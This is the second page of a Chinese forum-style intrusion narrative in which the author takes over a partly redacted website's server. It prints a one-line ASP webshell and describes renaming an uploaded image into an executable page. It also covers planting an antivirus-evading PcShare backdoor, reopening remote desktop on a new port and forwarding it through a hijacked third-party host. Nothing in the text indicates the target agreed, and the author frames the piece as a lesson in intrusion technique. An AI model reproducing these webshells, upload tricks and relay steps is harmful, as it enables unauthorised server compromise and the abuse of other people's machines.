Sa权限艰难入侵 拿下服务器

二.
一放就是一周，我想起以前无敌最寂寞也遇到过这样的现象，记得他是写了一个脚本下载的，翻箱倒柜找出这段脚本代码

用echo一句一句写入，再用copy命令copy 1.txt+2.txt+3.txt+4.txt+5.txt+6.txt+7.txt+8.txt+9.txt+10.txt test.vbs合并，可是在目录下却找不到这个脚本，没关系，无敌说是因为第二次使用重定向符>才会出现这个问题，我找出蓝屏大叔的一句话木马，只有这么一句<%execute request("value")%>，这样就不用使用两次重定向符，还是用啊D上传，type查看成功，再用蓝屏传个海洋s上去，也传上去了，可是用c端还是连接不上，直接用蓝屏传站长助手，也显示无法找到页面，到了这里，我简直绝望了，SA权限的注入点，xp_cmdshell可以使用，还是拿不下，真够丢人的。

三
休息一下，抽只烟，不要一条路走到天黑，退一步看看，又去他的网站上看了一下，还有个论坛，应该是自己编写的，注册会员，有个照片上传，于是抓包，修改，再用nc提交，还是不可以，这时候幽灵拨号者上线了，我问他有没有什么思路，大约过了一个小时他给了我一个页面http://www.sx***.com/bbs/pictures/2006.asp

得到了webshell，我觉得很郁闷，上传页面没有问题啊，问他，他给我一个命令
Ren D:\ECMS\webhome\bbs\picture\200512072015.jpg 2006.asp 我差点没撞墙去死，这么简单怎么我就没有想到呢（所以说思路很重要），接下来传个免杀pc share服务端上去，在“狂注幽灵”中执行，马上就上线了，

telnet上去，ipconfig /all看了一下

晕了，好丰富啊，为了进一步渗透内网，我一定要登陆他的3389，在海洋中看到终端端口是3389，可是netstat –an3389却不开放，算了，还是偶帮他重开一下吧，助人为乐嘛，（哎呀，谁打我！），用ps上传那个多功能开3389的工具，执行opents.exe 5211，这样就把终端服务的端口开成了5211，等它重启，

，好了5211开了，连接，还是连不上，看来还是防火墙或端口过滤，不过我在进程中没有找到防火墙进程，不要说是硬件的啊，汗~，只好用包转发工具了，我用的是啊长的angelshell，本地是图形界面的，方便我等菜鸟使用，打开FportClient，本地模拟端口写5984，远程计算机端口写5012，

再用ps上传那个Fport，执行Fport.exe 5211 202.97.*.* 5012（那个202.97.*.*就是我的肉鸡的ip），这样我连接肉鸡的5984端口就可以了，好了，我们连接看一下

呵呵，连上了，至此，这台主机的入侵告一段落！
总结：这次测试我们的权限是很大的，只是在得到webshell的时候费了点周折，没什么技术性，给大家展示的是一种思路，在入侵中思路很重要，头脑一定要非常清醒，才能从得到信息中找到突破口。

上一页  [1] [2]